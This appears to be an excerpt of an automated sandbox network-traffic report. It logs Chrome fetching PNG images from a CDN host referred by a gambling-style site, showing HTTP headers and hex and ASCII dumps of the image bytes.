                                                                                                                                                          2024-06-09 22:41:24 UTC16384INData Raw: f8 89 7a e0 63 1f 6b e2 92 85 a9 a4 06 94 2e 62 28 51 2e 79 2b 4c ce 3b 66 cd fb de ea 72 c9 e1 a6 6d ef df 7e fb 97 3e 7a 10 17 a1 24 dd 9c 90 64 6e b6 76 c2 3f fc e3 47 af 58 be bc bf af 6f a8 87 42 14 93 13 31 61 bb 45 14 c1 93 5b b6 b1 5d 49 56 2c 5b c2 5f 7e e4 8b ec a9 59 76 8c a7 f8 a5 15 94 8b 05 5a 51 56 6b b3 6f f7 28 d7 5f 77 23 a1 d6 7d 97 5c 7e f1 15 bd 2b 97 3e b8 7b 6b 7d 4b c1 0a 02 df 27 b5 29 46 f9 e9 0b 5f f5 8a 5b 7e f2 9d ef 5c b2 7b db d6 a5 b5 7a 8d c5 49 44 75 60 80 5c 33 25 9d ab 61 8c 63 a8 52 a5 56 ab e1 29 85 b5 86 4e ab 45 b3 56 a7 58 2a 65 8d a5 5c e6 91 08 a5 32 e8 c1 3c 41 8e 80 5a ab cd 6c bd 41 a1 5a c4 cf 2b bc 8e 64 7a 66 9a 25 3d 7d 4c d5 da e8 5c 91 a9 e9 09 d4 8a 1e 72 be ea 1e 67 96 c0 93 94 7a fb 68 b7 5a ec ab 37
                                                                                                                                                          Data Ascii: zck.b(Q.y+L;frm~>z$dnv?GXoB1aE[]IV,[_~YvZQVko(_w#}\~+>{k}K')F_[~\{zIDu`\3%acRV)NEVX*e\2<AZlAZ+dzf%=}L\rgzhZ7
                                                                                                                                                          2024-06-09 22:41:24 UTC8437INData Raw: a5 a4 69 3a 47 43 51 42 20 53 7b cc 5f 70 e0 84 c1 7e d6 9c 7d 3a 63 a3 87 69 b4 1a 84 46 30 d9 4c 38 38 d5 64 f7 68 93 dd 63 33 1c ae 36 49 f2 45 92 5c 9e 40 79 44 5a 50 2c 77 a7 27 9f 79 ce 53 c3 53 cd ec 8d 9f ff f2 65 9b 37 8f 16 88 61 e5 69 65 7a fb b2 5c b4 61 a5 97 d4 47 4f 75 75 03 87 e4 97 26 de 49 23 51 c2 f9 d6 c6 8d 97 7f 45 09 61 10 2e 88 1c 98 2c b1 ca 76 9f 7f f5 5b 7f 2b 7b f6 b9 ce b6 2f 7c 71 1a 9d 7c 4b 26 81 c1 09 80 3a ae f4 30 68 d2 38 44 ea 90 ac aa 81 3b c3 fd ff fe 89 31 1d d7 ff 30 e3 77 54 c3 24 97 0b 02 35 bf 15 a6 3f fc 99 c1 7a dc fe 57 09 f1 dc 95 e3 3f af 24 c7 df 8e 0f 2a 1b 2c 29 aa bd a8 9a d9 05 2b 0d 38 f2 e8 9d 93 53 4f 6c 4b 97 bc fa 5d b9 a1 b3 d6 bd b4 43 8e ec bb fb 33 1f 7b 1c d1 cb 4b de f2 fe ce 5d 8f 3c 18 18
                                                                                                                                                          Data Ascii: i:GCQB S{_p~}:ciF0L88dhc36IE\@yDZP,w'ySSe7aiez\aGOuu&I#QEa.,v[+{/|q|K&:0h8D;10wT$5?zW?$*,)+8SOlK]C3{K]<


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          699192.168.2.55047890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC611OUTGET /pc/image-pc/index/312/nav/eSports/fanya.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC619INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 123876
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:47 GMT
                                                                                                                                                          ETag: "5d71fe7f-1e3e4"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[6],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE20[4],EU-FRA-paris-GLOBAL1-CACHE12[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465098
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 5d8e59da1abc793955b1f3557824d14d
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126902
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:24 UTC15765INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 a1 00 00 00 af 08 06 00 00 00 54 d5 61 06 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRTatEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                                                                                                                          2024-06-09 22:41:24 UTC16384INData Raw: b4 56 9a 28 0e 48 de 00 ce 0b f2 0f 68 a2 04 a3 56 ab 73 69 bc ec 20 1c f3 c1 93 a9 7b de 5c 1a 1c 1e a5 38 b3 68 ef 0b 4b e9 89 a7 9f 61 6f d2 41 81 b6 99 b4 f8 89 67 a9 bb 39 44 47 1c 71 10 83 8f 95 dc fe 20 d5 31 3b f2 d4 35 b0 21 ce 92 71 17 0c 23 3b 14 41 17 35 b5 b7 50 f7 ec 19 52 14 80 de 18 8c 83 c0 3a 4f 6b 0d d1 d8 70 3f 0d 0e 0c d3 58 2c 4b d6 60 13 61 d7 42 5c d5 6e f1 48 6f 0c e6 e7 40 3c d5 50 b1 20 0c 95 cb 45 22 fb a3 3b 5e 63 63 97 c3 75 86 06 55 48 e3 c0 d9 09 47 c2 fa e8 6d 55 9f 9a aa 55 15 36 50 5c 81 aa 39 ec 6b a7 d3 42 0b e7 cc a2 cd 6f ac a5 82 dd 48 07 1e 3c 5f 14 3f 70 39 ce 9c 73 20 b5 b4 b7 91 c3 e3 91 d2 4e cc b7 95 5c 52 29 27 d7 a4 2a d7 6e a5 6a a4 d1 02 a4 55 27 09 97 85 19 69 0c 50 e5 0a f6 bd 83 2c 0e 17 99 f9 7e ab ad
                                                                                                                                                          Data Ascii: V(HhVsi {\8hKaoAg9DGq 1;5!q#;A5PR:Okp?X,K`aB\nHo@<P E";^ccuUHGmUU6P\9kBoH<_?p9s N\R)'*njU'iP,~
                                                                                                                                                          2024-06-09 22:41:24 UTC16384INData Raw: b4 2f 6a 27 70 ef 19 ba ec 4e 48 14 ff 2e df 23 d1 50 5f 0d 97 cd 86 48 34 0d 03 45 3c 37 5e 7d 15 14 83 49 28 ca b3 09 42 13 64 4c cd 56 bb 4c 18 b3 e9 e4 f4 9a 85 c2 4e 77 55 0d 02 23 c3 32 7b b1 7a f1 42 44 c9 e0 46 c6 47 61 f1 f9 44 a8 4d 90 43 2a 2e c3 88 ec 1a 2e 4a 7f fb 2a 2a 90 0f 66 d1 54 5b 05 87 c7 cd a9 81 42 3a 9d 99 91 5a 88 56 6b 99 91 42 f0 f5 b7 dc f2 f4 6f 1f fb e9 9d 5c 90 64 59 df ba fa 7a 99 ec 67 e4 e7 74 39 31 6b de 2c 24 3a 3b 90 a5 e8 c8 46 6b 71 dd 8d d7 62 c3 c6 8d 58 bf 6e ad 44 8e a9 64 5c a6 a8 0b 74 e5 c3 63 e3 22 cf e0 a2 f7 19 58 68 89 c9 53 a4 a3 28 2f 79 74 3a ff 48 a5 b3 38 f6 da 61 fb 55 9b 6f 64 0d 80 69 ab a9 6e df 77 0c b3 17 cc 7a 4b 37 cc 73 2f ed c4 bd ef bb 9b 8c d5 b4 1d be 21 95 4c ea b9 7e c0 3b 22 c3 8a 96
                                                                                                                                                          Data Ascii: /j'pNH.#P_H4E<7^}I(BdLVLNwU#2{zBDFGaDMC*..J**fT[B:ZVkBo\dYzgt91k,$:;FkqbXnDd\tc"XhS(/yt:H8aUodinwzK7s/!L~;"
                                                                                                                                                          2024-06-09 22:41:24 UTC16384INData Raw: 32 e3 fd e8 3f 38 02 6f 30 84 40 65 23 fa 0f 6d c5 9e 2d eb 90 1e eb 95 7b 17 83 e6 93 7f 27 da 4a 9b b4 1b 25 85 bc 74 c2 4e 3f 7a c2 dd 8a 8e c6 47 12 c8 2b f0 21 26 c6 bf 3d 46 d9 20 a6 54 1d 18 1c 1f c1 40 da 8e 91 f1 09 78 1d 6e 84 dc 05 b0 27 26 b5 16 16 11 74 95 27 11 64 a1 18 64 d6 b7 54 43 2f 6d a4 61 e8 80 b4 df 49 d3 94 29 f4 f6 f7 2b ca f4 c9 c1 67 60 c3 40 25 e8 cb 17 e7 11 c6 83 bf 7a 1c 8f 3e f6 04 1a a6 d7 61 e1 dc 39 12 85 ce 11 e7 51 83 72 41 4e 44 38 3e 4b de 88 2a ed 64 02 32 75 36 26 51 6b bf 18 80 0e 31 16 47 8f b6 a0 ad bd 13 7d e2 40 27 b3 76 04 82 85 62 40 ea 4c e0 64 39 15 76 c0 27 34 1d 29 d7 e7 f3 28 02 8a 27 53 66 7a a8 c3 a1 75 2c a8 1a 86 b6 21 2b ab 0e 8a 88 a8 5e 91 36 d3 4a 99 92 66 9a c6 06 35 f4 6c 70 a5 81 72 91 65 a6
                                                                                                                                                          Data Ascii: 2?8o0@e#m-{'J%tN?zG+!&=F T@xn'&t'ddTC/maI)+g`@%z>a9QrAND8>K*d2u6&Qk1G}@'vb@Ld9v'4)('Sfzu,!+^6Jf5lpre
                                                                                                                                                          2024-06-09 22:41:24 UTC16384INData Raw: 08 6a 16 3f fa f0 ef 71 91 20 a5 48 3c 8a 3d 7b f6 a9 98 70 4c f6 cb b1 c3 47 30 3e 91 c4 f1 e6 fd e2 38 26 b0 6f ff 61 7c f9 2b 77 6a 5d ed c7 3f f9 1e 0e 1d 6c 52 85 78 92 2f 68 13 34 a0 c9 a9 88 58 44 a0 23 87 8e e0 8a 2b 2e b5 08 43 4e 45 6d 3c 93 0b 16 cc 57 e4 48 55 08 ce 67 d2 26 6e ed 3b 33 1a 90 59 cb 51 6b 70 2c c8 8b 4a e1 1e 15 ca 75 60 40 f6 e9 a0 ac 4b 34 ed 46 ff 50 98 d9 5b 14 88 93 62 b0 cd 33 c4 99 5c 3a 33 2c 9d d5 a1 8d ac ff 70 7d 9d f2 73 66 2a 7a 65 8d 5f da b0 5e 5b 01 16 cc 6c d4 ba 37 47 73 f0 79 d2 79 b2 e7 28 43 47 24 af 19 e8 ec 54 36 5d 59 55 95 36 29 fb 82 85 9a 66 3e fd 94 93 d0 d1 3b a8 ea 31 d4 f3 1b 19 19 c7 a6 d7 b7 ad d8 ba 6d cf 35 0d d3 aa ea 05 09 8d 09 12 6a ff ef 46 42 8e db 6f ff a6 dc 54 fe 9f fd 4d d8 e8 70 04
                                                                                                                                                          Data Ascii: j?q H<={pLG0>8&oa|+wj]?lRx/h4XD#+.CNEm<WHUg&n;3YQkp,Ju`@K4FP[b3\:3,p}sf*ze_^[l7Gsyy(CG$T6]YU6)f>;1m5jFBoTMp
                                                                                                                                                          2024-06-09 22:41:24 UTC16384INData Raw: a5 df 38 0b c7 cd 9e 89 bf 3c f5 12 06 65 cd c9 4a cf 16 07 d7 89 99 0d 91 6f b0 d5 1a a7 cd a6 9d f1 9e 9a b1 31 d1 88 a9 98 b0 ba 91 92 6a 74 b7 f8 1a 8e a8 a9 00 31 bb 54 a4 af 3f a8 f6 81 b6 3f 5b d6 f4 70 55 55 ea e3 7f 78 f4 f7 7f fd db d3 2b 94 16 e4 ff 95 13 fa 6c cd 9a 33 b7 6e d9 33 2d b7 a0 42 0d 31 e1 83 a1 70 bb 31 92 a1 80 d6 2d 0b 73 f3 e5 f2 84 24 da 30 33 2e b1 12 d2 31 29 62 63 d4 b9 40 31 29 ec b0 25 07 54 83 1e 89 9a 1a b9 1c 02 32 70 d3 00 b1 3f 44 14 0c 0f 31 cb 36 01 8d e4 ac 38 9b 38 c2 f6 f6 16 ac 5c 3a 57 c5 e2 7a e5 92 3d fd fc 3b 78 e5 f5 8f 25 92 1b 16 03 24 ce 23 d7 ab 91 b7 d3 e5 47 69 71 81 38 be 04 0c 06 c2 f1 9e 48 5f 4f 1f 2e bf ec 6c 7c f9 e5 2e 34 35 f7 20 b7 40 22 1d 89 46 e3 65 2f aa ab 4a a4 40 2a 1f 3d a0 ff 20 fe
                                                                                                                                                          Data Ascii: 8<eJo1jt1T??[pUUx+l3n3-B1p1-s$03.1)bc@1)%T2p?D1688\:Wz=;x%$#Giq8H_O.l|.45 @"Fe/J@*=
                                                                                                                                                          2024-06-09 22:41:24 UTC16384INData Raw: d2 67 7e 0d af ec 3b 80 f1 e9 74 cf 96 4d ab 93 ab d7 ac 39 97 8c 46 d3 ff 21 27 f4 e4 93 4f 6a 5d f0 5f 7c 2c 3d f0 c6 ee 2f e5 52 19 5f 9d 5c 10 61 c1 ed 12 45 95 33 09 45 9e 90 2b ab 48 7a 14 af cf f6 2f 48 ef 57 b6 51 89 47 95 0e 35 62 91 85 6b ef 6c c1 f0 f0 52 45 be 71 c0 29 dc d2 a2 93 b9 4c e7 d9 1c 63 c9 a6 4e 21 db a6 e1 d5 d4 10 36 28 2d 92 79 92 f0 51 bc ef 35 db af c2 6d b7 dc 80 d9 f3 67 14 f3 1f 10 a3 a0 4b ef 35 2c d5 da 0b 51 e6 e9 a2 11 be 92 07 5e cc 65 b5 ce 9d 93 fb c9 67 52 3a 00 18 8b c6 31 1f 89 e3 f4 85 09 4c c7 e2 e8 59 b2 1c 05 59 84 ec c2 ac 1c 7c 71 86 bc 0e 1a 13 31 38 bd ed ed e8 6a 6d 97 8c 2a af 8e d7 ef 0d e9 a6 61 83 9b 90 f0 70 93 44 58 6d 5d 06 fc 60 d5 07 ab 02 78 66 f3 b2 9f 15 d0 72 94 99 19 28 a3 59 29 5c 42 b5 88
                                                                                                                                                          Data Ascii: g~;tM9F!'Oj]_|,=/R_\aE3E+Hz/HWQG5bklREq)LcN!6(-yQ5mgK5,Q^egR:1LYY|q18jm*apDXm]`xfr(Y)\B
                                                                                                                                                          2024-06-09 22:41:24 UTC9807INData Raw: 96 1a 2e 2a 96 3a 8a 52 32 a3 30 25 93 8d 78 0d 6f 0c bb 31 23 53 63 98 89 4c 63 a8 6f 10 7d bd bd 68 09 93 3b ac c1 0e e2 9a 1e 03 d9 43 c8 5c 31 30 d0 0f 57 32 5e a2 f3 a6 25 3a 2e a9 36 51 46 d1 43 45 6d ec 4b 76 40 2a 2c 1d 66 0d 6a 65 80 07 c4 70 9f 95 2c 44 df 2a ea 7a 8c 12 6b 4d 94 b0 8a fa 2a b1 24 e5 5a 27 66 32 99 92 95 01 57 66 67 96 00 d9 53 aa f8 35 3b aa 36 e0 ab ca a4 15 cd 38 4d e0 c3 92 a5 d2 e7 c8 e7 f9 aa 23 b2 8e 50 03 19 ee 27 56 6f b2 05 2c 56 f7 67 d1 40 9f 5d af 91 ef ae 0b 91 cc b5 49 4b b4 0c 3c 4a 16 ea 4c 54 a2 ee 31 96 70 e4 5e 93 e9 45 bc 71 70 bf f6 12 36 2e 1b 46 e1 dc 24 32 89 9c 44 d1 2d ca 40 42 80 83 a3 08 50 af 5e 87 21 2e 75 0d 43 3f f7 30 19 f2 25 c8 a4 b0 e5 9c 04 1b 0b 91 14 66 e6 25 08 91 4c 42 f7 0d cf 0d 7b 67
                                                                                                                                                          Data Ascii: .*:R20%xo1#ScLco}h;C\10W2^%:.6QFCEmKv@*,fjep,D*zkM*$Z'f2WfgS5;68M#P'Vo,Vg@]IK<JLT1p^Eqp6.F$2D-@BP^!.uC?0%f%LB{g


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          700192.168.2.55048690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC609OUTGET /pc/image-pc/index/312/nav/card/bg_img.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 38319
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Sun, 02 Feb 2020 09:52:24 GMT
                                                                                                                                                          ETag: "5e369bd8-95af"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[4],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,4],EU-FRA-paris-GLOBAL1-CACHE16[3],EU-FRA-paris-GLOBAL1-CACHE16[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465098
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: bce9afe1f0bdab7622bd8846223bf5a8
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126902
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:24 UTC15767INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRQjtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
                                                                                                                                                          2024-06-09 22:41:24 UTC16384INData Raw: 43 47 30 0c 39 5a 1e ad 4d 0e 8c 28 69 a2 31 91 aa 6c a2 da fc 31 24 d2 68 10 a4 9b 93 2b ff 74 a8 dc 8b 9d 76 d8 f6 d9 c7 b3 4e 5b 74 e9 ab 77 3d f2 54 ef 5b 33 4e 58 b0 0f 84 47 7e 62 b0 d0 25 38 71 b2 5e 88 f8 a8 14 b1 5d 90 c3 9d 81 ce d6 d8 e6 f7 de 48 24 9f 41 e9 45 2d 12 a3 ab 15 fb 9f 7d 2d a7 9e 1d 4b 9e c1 c4 a8 72 98 67 55 bc f3 93 2f e6 04 9d 03 6a 3f 5b 2d 91 32 52 30 50 a0 3b 99 6c 49 18 32 a7 b1 33 b2 c6 a4 6e 79 e7 63 11 94 74 64 8a 81 e4 0a 46 e6 30 d6 7d 74 be 95 ea 03 dd 0f 3d fc 37 70 bb 7b 60 f7 de 3d 70 d9 cc 13 e1 f1 15 cb e0 ec ad 6f 83 76 d5 27 90 61 8c d3 aa 92 fb 3e d9 0c 95 09 1e fe 7e ff bf 21 81 c2 ef f8 e3 66 c0 e8 89 e3 a0 b5 ae 0d f6 af df 00 e3 32 d2 e0 df 7f bd 07 96 af 58 0d ab b7 6d 03 a7 c5 4e 73 52 74 24 b3 9f 45 12
                                                                                                                                                          Data Ascii: CG09ZM(i1l1$h+tvN[tw=T[3NXG~b%8q^]H$AE-}-KrgU/j?[-2R0P;lI23nyctdF0}t=7p{`=pov'a>~!f2XmNsRt$E
                                                                                                                                                          2024-06-09 22:41:24 UTC6168INData Raw: 5f bf 1f ae 59 62 03 77 74 08 04 83 19 0a aa eb 50 30 24 ea 45 80 c1 a4 17 76 e3 4e 27 31 1b 99 f6 ff a8 59 30 9f 0d 63 93 90 81 a4 37 25 cc 99 df 02 2f bc f8 3a 8c cf 15 25 82 e5 43 dc 64 43 ed 63 14 d1 fb 42 8d 40 f2 52 22 89 06 93 11 34 64 8a 08 9a 15 62 ee 14 c4 33 0a 21 43 44 35 4f 02 70 46 d4 26 24 89 e9 09 c7 69 3b 49 7d 5d 21 9c bd 72 16 cc 9a d3 d0 59 52 55 76 75 4d a1 fb 03 19 21 a5 88 0b 99 50 f5 4e 4b 52 0a 9a 14 aa 58 5e a8 58 36 fb 6f 89 8d d1 9f b7 f8 1a ee f5 bc 61 2d 76 ae 6c bb 7f 5f fc ad 2b ea fd cf 7d e7 f4 e4 ce e4 3f b9 b9 b5 63 8a e7 3f 45 05 1d 1f 76 fc 4b 1c 54 93 1f 3f 7c 74 97 f1 b3 8e 31 33 71 89 13 43 af ff e5 62 7b 62 d5 ef f6 1a 72 0b 72 4f 96 39 61 fd e5 0e 53 fa 2d 53 be fb 48 51 4e 19 a9 d4 0f 87 02 60 37 e5 c2 d2 b9 17
                                                                                                                                                          Data Ascii: _YbwtP0$EvN'1Y0c7%/:%CdCcB@R"4db3!CD5OpF&$i;I}]!rYRUvuM!PNKRX^X6oa-vl_+}?c?EvKT?|t13qCb{brrO9aS-SHQN`7


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          701192.168.2.55048490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:24 UTC609OUTGET /pc/image-pc/index/312/nav/card/lg_img.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:24 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:24 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 37334
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Sun, 02 Feb 2020 09:52:24 GMT
                                                                                                                                                          ETag: "5e369bd8-91d6"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[8],EU-GER-frankfurt-EDGE5-CACHE1[0,TCP_HIT,7],EU-FRA-paris-GLOBAL1-CACHE1[6],EU-FRA-paris-GLOBAL1-CACHE10[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465098
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: d2f46d4e8a6eda011066f97b37b21a85
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126902
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:24 UTC15768INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 8b 00 00 00 8b 08 06 00 00 00 51 19 6a ff 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRQjtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01
